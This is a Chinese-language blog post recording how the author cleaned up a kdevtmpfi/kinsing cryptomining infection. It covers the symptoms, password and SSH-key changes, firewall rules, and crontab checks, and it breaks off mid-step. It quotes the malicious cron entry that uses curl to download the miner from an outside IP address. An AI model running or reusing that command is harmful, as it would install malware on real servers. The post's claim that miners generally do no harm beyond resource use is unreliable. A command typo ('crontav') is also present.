记一次被注入挖矿程序kdevtmpfi解决记录
前言 发现自己服务器资源使用异常,cpu使用率100%,内存使用也很多,且有陌生的进程。那很有可能是被入侵植入了挖矿程序 解决问题 遇到这种问题切忌惊慌失措,一般挖矿程序除了占用服务资源不会有其他危害 1. 切断来源 一般被侵入的话,服务器上的计划任务会被修改,会有一个进程一直在检测程序是否存在,如果只kill进程删除文件的话会发现过不了一会就会死灰复燃,所以斩草除根,先把去外界不安全的连接关掉。 被修改的计划任务如 curl -o /tmp/kinsing http://45.137.155.55/kinsing 修改服务器密码如果是密钥登陆的切换密钥 passwd user1 #使用root用户修改密码,root用户密码最好也修改下 服务器配置防火墙禁止例如计划任务里的ip访问,云服务器的话可以只允许公司网络访问,去掉非必要暴漏在外的服务端口访问权限,异常访问ip加入防火墙 检查系统的ssh密钥文件,删掉陌生密钥 vim /root/.ssh/authorized_keys 2. 删除挖矿程序 如果直接删除的话可能会发现一会就又开始运行,这是因为没有kill掉它的父进程 检查计划任务删掉异常任务 # 查看 crontab -l #查看root用户下的 crontav -u centos -l #查看centos用户下的(最好普通用户的也看下,方式删除不干净) # 修改